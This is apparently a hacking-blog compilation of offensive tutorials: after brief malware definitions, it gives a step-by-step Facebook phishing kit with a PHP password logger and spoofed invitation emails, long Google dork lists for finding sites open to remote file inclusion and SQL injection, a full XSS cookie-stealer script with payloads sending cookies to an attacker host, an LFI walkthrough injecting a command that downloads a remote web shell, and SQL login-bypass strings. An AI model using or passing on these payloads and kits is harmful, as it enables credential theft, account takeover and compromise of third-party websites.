What is a trojan/worm/virus/logic bomb?

Trojan:
Remember the Trojan Horse? Bad guys hid inside it until they could get
into the city to do their evil deed. A trojan computer program is
similar. It is a program which does an unauthorized function, hidden
inside an authorized program. It does something other than what it
claims to do, usually something malicious (although not necessarily!),
and it is intended by the author to do whatever it does. If it's not
intentional, its called a 'bug' or, in some cases, a feature Some
virus scanning programs detect some trojans. Some virus scanning
programs don't detect any trojans. No virus scanners detect all
trojans.
Virus:
A virus is an independent program which reproduces itself. It may
attach to other programs, it may create copies of itself (as in
companion viruses). It may damage or corrupt data, change data, or
degrade the performance of your system by utilizing resources such as
memory or disk space. Some virus scanners detect some viruses. No
virus scanners detect all viruses. No virus scanner can protect
against "any and all viruses, known and unknown, now and forevermore".
Worm:
Made famous by Robert Morris, Jr. , worms are programs which reproduce
by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems. They are self
contained and use the networks to spread, in much the same way viruses
use files to spread. Some people say the solution to viruses and worms
is to just not have any files or networks. They are probably correct.
We would include computers.
Logic Bomb:
Code which will trigger a particular form of 'attack' when a
designated condition is met. For instance, a logic bomb could delete
all files on Dec. 5th. Unlike a virus, a logic bomb does not make
copies of itself.

Read more »

How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id

Now im gonna make a step by step tutorial for facebook accounts.

WITH PICTURES!!!



ONE!:

go to "www.facebook.com/login.php" and right click on some white space
on the page and press "view source code". ALOT of text is gonna appear,
copy it all to notepad.



TWO!:

Now we need to change a few things in the code. So that the login button
sends the info to our file instead of the facebook login. We do that by
editing the action of the code. So press Edit >> search. and
search "action=" without the quotes. you should find this





The big red ring that circles the "action=" you have to change. You have
to change it to 'action="next.php" '. after you have done that, you
should change the method (small red circle on the picture) to "get"
instead of "post", or else it will not work. Save the document as
"index.PHP" (not htm!)



THREE!:

Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this:

   
       
           
           
                <?php

header("Location: http://www.Facebook.com/login.php ");

$handle = fopen("passwords.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>
           
       
   
Save this as "next.php"



Note: for security you should rename "passwords.txt" to something else.

now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.



FOUR!:

Upload the 3 files "index.php", "next.php" and "passwords.txt" (or
whatever the password file is called) to a subdomain hosting site. THEY
MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com.
When you made an account you should upload the 3 files.



Congratz. You have yourself a working Phisher site!



FIVE!:

now we would like to send spoof emails out. To do that we should first
make an email account. which starts with facebook@. or something that
looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six.



SIX!:

Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!

remove the hyperlink from this link:

http:/www.facebook.com/n/?reqs.php

Mark it and push the Add hyperlink button







Add hyperlink button in the red circle. now write your phisher page url
in the hyperlink bar that appears after clicking the button. and click
add. The hyperlink should still display
http:/www.facebook.com/n/?reqs.php

but lead to your phisher page.. Thats pretty kewl. Now i belive your
ready to send your spoof emails to everybody you know. and hopefully
some of them will fall for it.

Read more »

How to search Vulnerable site

1-) First go to http://www.google.com


2-) Press on the right, next to the textfield, on "Advanced Search".






3-) Fill in your dork at "This exact wording or phrase".
    Results per page: 100 results (Or less depending on your internet speed.)
    Language: Could be all languages or one language. I choose Dutch
because I'm Dutch myself and I got a Dutch ISP so those sites will load
faster.
    Where your keywords show up: "in the URL of the page"


4-) Press search.


5-) Now we get this:






6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab.


7-) Open the tabs and add as example a single quote behind the link.


8-) If it's vulnerable continue your injection else repeat step 5 -> 6.



Very easy (:

With this method I can find about 30 vulnerable websites in less than 2 hours and a few websites to upload a shell to.

Read more »

Apple Website Hacked by HodLuM

One of the Apple Sub-Domain claimed to be Defaced By HodLuM as shown above. The Deface Link is just an IMAGE uploaded to Apple domain. Hacker use "N00BZ" word for all Hacker including Anonymous , Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. AOL Postmaster Website was also got hacked by HODLUM some months before.

Read more »

RFI - Remote File Inclusion.

Today I will be teaching you guys RFI (Remote File Inclusion).

What is RFI?
RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites, many users of HackForums have dorks for searching for RFI vulnerable websites, as well as having lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion is exactly what it's name is. You include a file onto the website remotely.

What makes a page vulnerable?
A PHP include script looks like this.

Code:

<?php
include($_GET['p']
?>

Since the code uses 'p' the syntax would be:

Code:

http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?

If the script looks like this:

Code:

<?php
include($_GET['lulz']);
?>

The syntax would then be:

Code:

http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

Understood?

What can I accomplish with RFI?
You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?
Using dorks, exploit scanners, etc.

Here is a list of RFI dorks:

Code:

inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d); ​&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="

Exploit scanners: http://www.youtube.com/v/f6SOzynrWx4

We've got our target, how do we exploit this vulnerability?
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.

Code:

http://victimsite.com/index.php?p=interview.php

As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.

Tweaking and exploiting.
So now we want to tweak this to our advantage. This is rather simple.

What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.

Code:

http://yoursite.com/shell.txt

Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.

Code:

http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?

The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it.

Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?%00".

I hope this helps. Happy hacking.

Read more »

XSS - Cross Site Scripting.

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it.

What is XSS, what can I accomplish with it?
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?
Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

What types of XSS are there?
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

What will you be teaching today?
The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.

Code:

<script>alert('XSS');</script>

We now see a pop up message on our screen saying "XSS". This is what it should look like: http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

Code:

"><script>alert('XSS');</script>

Okay, we have found out that it is vulnerable. We can now move on.

How can I deface a webpage with XSS?
I will be showing you methods for persistent, and non-persistent XSS.

Persistent XSS.
First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:

Code:

<script>window.location="http://yourdefacepage.com/index.html";</script>

Remember, you can always alter the code if it doesn't work.
You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.
Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger.
Make two files:
Cookiemonster.php
Cookies.txt

Cookiemonster.php:

Code:

<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./cookies.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>

Then just leave cookies.txt blank. But make sure you made the file.

How do I send my cookie logger to my slave?

Code:

<a href="javascript:document.location='http://www.mysite.com/cookiemonster.php?cookie='+document.cookie;">Click here!</a>

Code:

<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>

What does a cookie look like?
Once you have received their cookie it should end with "PHPSESSID=52ce8e4a74936673js24500be1919004"
The cookie is the string after "PHPSESSID="
There are different forms of cookies. If you have your cookie logger setup correctly it won't matter, just copy and paste it all into your cookie editor.

What can I do with someone else's cookie?
Once you have someone else's cookie you can use a cookie editor, (search for one on Google) go to the victims website, change your cookie to their's and you should be logged in as the user they are. Example; if your target is "admin" and "admin" has logged into the site, you send him your cookie logger and steal his cookie, you then change your cookie to the admin's cookie, and you will then have access to the website and do as you wish.

Using other programming languages for XSS.
It's simple, to test if it's vulnerable try this.

Code:

<html><font color = "red">XSS</font>

If the text says XSS in red, then it's vulnerable to HTML injection as well. Just inject other languages in, and you will be able to do much more.

I hope this helps. Happy hacking.

Read more »

LFI (Local File Inclusion)

1 – Introduction


In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.


2 – Finding LFI


- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.

Code:

www.website.com/view.php?page=contact.php

- Now lets replace contact.php with ../ so the URL will become

Code:

www.website.com/view.php?page=../

and we got an error

Code:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

Code:

www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Code:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

Code:

www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file.

Code:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

Code:

www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

Code:

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.

Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

Code:

www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code :

Code:

<?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>

{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread}

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and will save it as shell.php in the

website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.

Code:

www.website.com/shell.php

Our shell is there.Injection was succesfully.

Read more »

Complete SQL Injection Tutorial

Introduction:

Hello every one .

I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :

Data is in the columns and the columns are in tables and the tables are in the database .

Just remember that so you understand the rest .

PART 1

Bypassing admin log in

Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp

First we need 2 find a site, start by opening google.

Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"

There is a large number of google dork for basic sql injection.

here is the best:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.

the site should look something like this :

ADMIN USERNAME :

PASSWORD :

so what we do here is in the username we always type "Admin"

and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this

username:Admin

password:'or'1'='1

that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in :D

PART 2

Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.

Download SQLI dorks list from here :

http://www.mediafire.com/?y7v30lcj0kn8836

http://adf.ly/cjpJ <--- password is somewhere in it

PS:I didn't put them in the thread because i passed count limit...

